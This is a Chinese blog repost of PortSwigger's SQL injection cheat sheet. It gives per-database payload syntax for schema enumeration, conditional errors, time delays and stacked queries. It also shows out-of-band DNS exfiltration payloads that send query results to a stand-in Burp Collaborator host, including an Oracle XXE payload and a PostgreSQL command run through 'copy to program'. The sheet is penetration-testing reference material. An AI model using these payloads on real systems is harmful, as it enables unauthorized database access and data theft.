SQL注入小抄

于 2022-11-25 19:51:18 发布
阅读量294 收藏
点赞数
文章标签: 数据库 postgresql mysql
原文链接:https://portswigger.net/web-security/sql-injection/cheat-sheet
版权

这个SQL注入小抄包含了一些有用的语法例子,你可以用来执行各种在进行SQL注入攻击时经常出现的任务。

字符串连接
你可以将多个字符串串联起来,组成一个字符串:

Oracle    'foo'||'bar'
Microsoft    'foo'+'bar'
PostgreSQL    'foo'||'bar'
MySQL    'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

子串
你可以从一个指定的偏移量中提取字符串的一部分,并指定长度。注意偏移量的索引是基于1的。下面的每个表达式都将返回字符串ba。

Oracle    SUBSTR('foobar', 4, 2)
Microsoft    SUBSTRING('foobar', 4, 2)
PostgreSQL    SUBSTRING('foobar', 4, 2)
MySQL    SUBSTRING('foobar', 4, 2)

注释
你可以使用注释来截断一个查询,并删除原始查询中跟随你输入的部分。

Oracle    --comment
Microsoft    --comment
/*comment*/
PostgreSQL    --comment
/*comment*/
MySQL    #comment
-- comment [Note the space after the double dash]
/*comment*/

数据库版本
你可以查询数据库以确定其类型和版本。这些信息在制定更复杂的攻击时很有用。

Oracle    SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft    SELECT @@version
PostgreSQL    SELECT version()
MySQL    SELECT @@version

数据库内容
你可以列出数据库中存在的表,以及这些表所包含的列。

Oracle    SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft    SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL    SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL    SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

条件性错误
你可以测试一个单一的布尔条件,并在条件为真时触发一个数据库错误。

Oracle    SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual
Microsoft    SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL    1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN CAST(1/0 AS INTEGER) ELSE NULL END)
MySQL    SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

分批(或叠加)查询
你可以使用分批查询来连续执行多个查询。注意,当后续的查询被执行时,结果不会返回给应用程序。因此,这种技术主要用于与盲目的漏洞有关,你可以使用第二个查询来触发DNS查询、条件错误或时间延迟。

Oracle    不支持批量查询.
Microsoft    QUERY-1-HERE; QUERY-2-HERE
PostgreSQL    QUERY-1-HERE; QUERY-2-HERE
MySQL    QUERY-1-HERE; QUERY-2-HERE

注意:对于MySQL,分批查询通常不能用于SQL注入。然而,如果目标应用程序使用某些PHP或Python API与MySQL数据库通信,这偶尔是可能的。

时间延迟
当查询被处理时,你可以在数据库中造成一个时间延迟。下面的情况将导致无条件的时间延迟10秒。

Oracle    dbms_pipe.receive_message(('a'),10)
Microsoft    WAITFOR DELAY '0:0:10'
PostgreSQL    SELECT pg_sleep(10)
MySQL    SELECT SLEEP(10)

条件性的时间延迟
你可以测试一个单一的布尔条件,并在条件为真时触发一个时间延迟。

Oracle    SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
Microsoft    IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL    SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL    SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')

DNS查询
你可以使数据库执行对外部域的DNS查询。要做到这一点,你需要使用Burp Collaborator客户端生成一个独特的Burp Collaborator子域,你将在攻击中使用,然后轮询Collaborator服务器以确认发生了DNS查询。

Oracle 以下技术利用XML外部实体(XXE)漏洞来触发DNS查询。该漏洞已被修补,但仍有许多未修补的Oracle设备存在。

SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

下面的技术在完全打过补丁的Oracle安装上也可以使用,但需要提升权限。
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Microsoft    exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL    copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL    The following techniques work on Windows only:
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

带有数据渗出的DNS查询
你可以使数据库执行DNS查询到一个包含注入查询结果的外部域。要做到这一点,你需要使用Burp Collaborator客户端生成一个独特的Burp Collaborator子域,你将在攻击中使用,然后轮询Collaborator服务器以检索任何DNS交互的细节,包括渗出的数据。

Oracle    SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Microsoft    declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL    create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQL    The following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'

jiecy
关注
82.网络安全渗透测试—[SQL注入篇21]—Oracle+JSP-pipe.receive_message延时注入
qwsn
01-21 7405
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 延时注入 1、简介 2、注入技巧 二、pipe.receive_message 延时注入示例 1、判断是否存在注入 2、猜解长度并逐个猜解字符 3、以上可以替换的SQL语句
sql基础语法考试必备小抄
09-05
sql的一些查询、删除、更新、插入、创建、修改的基本语法、考试的时候可以当作小炒、公司笔试的时候效果更佳,有实践证明的!
mysql 小抄
北冥有鱼的博客
06-27 281
以第一次查询的结果作为第二次查询的条件 SELECT * FROM sh_direct_mapping WHERE csite_id = (SELECT csite_id FROM devices WHERE dev_code = 16030036);
oracle延时盲注如何防止,【原创】WEB安全第四章SQL注入篇21 oracle 延时注入
weixin_35679813的博客
04-07 790
WEB安全第四章SQL注入篇21 oracle 延时注入1、简介DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制。首先,不能直接将该函数注入子查询中,因为Oracle不支持堆叠查询(stacked query)。其次,只有数据库管理员才能使用DBMS_LOCK包。在Oracle PL/SQL中有一种更好的办法,可以使用下面的指令以内联方式注入延迟:dbms_...
不同数据库注入总结
向阳-Y.的博客
04-20 910
oracle: dual是oracle自带表: select 'aaa' from dual; 同mysql的information_schema select table_name from all_tables; select columns_name from all_tables where table_name='USER'; 时间注入: select dbms_pipe.receive_message(('a'),10); select count(*) from all_users t1,
《labuladong算法小抄》2021完整版 共666页
06-17
《labuladong算法小抄》压缩整理-第零章:框架结构之数据结构 一、存储方式 1、根本存储方式:数组(顺序存储)、链表(链式存储) 2、【队列】、【栈】 3、【图】 4、【散列表】:用散列函数把键映射到一个大数组 5...
labuladong的算法小抄官方完整版
08-14
labuladong的算法小抄官方完整版,pdf版本,文本格式,可直接复制和编辑
Java面试小抄面试指南
06-29
「Java面试指南」一份通向理想互联网公司的面试指南,包括 Java基础、Java并发、JVM、MySQL、Redis、Spring、MyBatis、Kafka、计算机操作系统、计算机网络、系统设计、分布式、Java 项目实战等
C++考试小抄
05-05
帝国理工给萌新上的C++课程考试小抄,一些知识点我们不需要背诵,允许用一页A4纸。(原创。切勿转载,违者必究!)
Oracle_SQL注入
07-01
Oracle_SQL注入果断分享
SQL基本语法精典
11-17
mysql 语法快速全面教程,从基础语句开始,有基础表,容易理解。
DBMS_PIPE管道通信
似水流年
05-12 3131
/**问题: 在编译过程的时候发现有"DBMS_PIPE"标识符必须声明的错误PLS-00201 */ /**分析: 通过角色获得的权限无效 所以通过grant dba to xaxnb而得到的xaxnb用户的权限是dba的权限,在PLSQL中是没有这个权限的 需要通过显式的直接给用户授权,所以需要执行grant all on dbms_pipe to public来进行授权 */ /**解决: 1 使用sysdba用户权限登录ORACLE 2 执行grant execute on
利用Oracle dbms_pipe实现存储过程之间的通信
wzy0623的专栏
12-28 2234
应用程序开发人员的需求是这样的:1. 根据条件给每一个国家的商品生成唯一7位随机代码,不同国家之间的商品代码可以相同2. 如果输入标准分隔符的字符串,则解析该字符串作为需要生成的商品ID,为其生成代码,否则为商品表中所有商品ID生成代码3. 代码的每一位要符合相应的规则,例如第一位的规则是[0123],则这位只能是0、1、2、3中的一个数4. 由于可能一次生成大量的代码,这个过程需要较长时间,所以
Oracle的管道(dbms_pipe) 通信
长安诗社社长@-梁瀚文- https://github.com/HevnChin https://gitee.com/HevnChin
09-02 2655
Oracle的管道(dbms_pipe)我今天在看一个文档时,其中提到了Oracle管道的应用,我的理解是管道就是会话间通信的一种方式,类似于程序的进程间通信.1、再一个session中建立管道set serveroutput on;declarev_statpipe1 integer;v_statpipe2 integer;v_pubchar varchar2(100):='This is a text string';v_pubdate date := sysdate;v_pubnum number :
Oracle PL/SQL进阶编程(第七弹:使用系统包:DBMS_PIPE)
艺术就是爆炸的专栏
08-08 1299
DBMS_PIPE包用于在同一个Oracle的Instance,即例程的不同会话之间进行通信。管道非常类似于UNIX操作系统中的管道,但是Oracle管道并不是使用像在UNIX中那样的操作系统调用的机制,其管道信息被缓存在系统全局区(SGA)中,当关闭Oracle例程时,就会丢失管道信息。管道又可以分为如下两种类型: - 公用管道:指所有数据库用户都可以访问的管道。 - 私有管道:只能由建立管...
SQL注入备忘单
weixin_44223191的博客
07-30 167
文章目录字符串连接注释数据库版本数据库内容条件错误批处理(堆叠)查询时间延时有条件的时间延时DNS查找使用数据溢出进行DNS查找 字符串连接 您可以将多个字符串连接在一起以生成单个字符串。 Oracle 'foo'||'bar' Microsoft 'foo'+'bar' PostgreSQL 'foo'||'bar' MySQL 'foo' 'bar' [注意空格] C...
WEB渗透测试知识梳理-注入类-1-SQL注入-Oracle
痴人说梦梦中人
06-17 2824
1.3.2 ORACLE 注入 1.3.2.1 报错注入 1.3.2.2 布尔盲注 1.3.2.3 时间盲注 1.3.2.4 宽字节注入 1.3.2.5 二次注入 1.3.2.6 联合注入 1.3.2.7 堆查询注入
PostgreSQL有条件的禁止修改和删除数据
kmblack1的专栏
06-23 1520
PostgreSQL有条件的禁止修改和删除数据
[译稿]PostgreSQL 中匿名事务的使用
weixin_34275734的博客
11-07 244
2019独角兽企业重金招聘Python工程师标准>>> ...
Labuladong算法小抄修订版PDF下载
资源摘要信息:"labuladong的算法小抄(修订版)" 知识点: 1. 标题解读: 标题"labuladong的算法小抄(修订)"表明这是一个关于算法的学习资料,由个人或小组labuladong制作,并经过修订。标题中未提供更具体的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值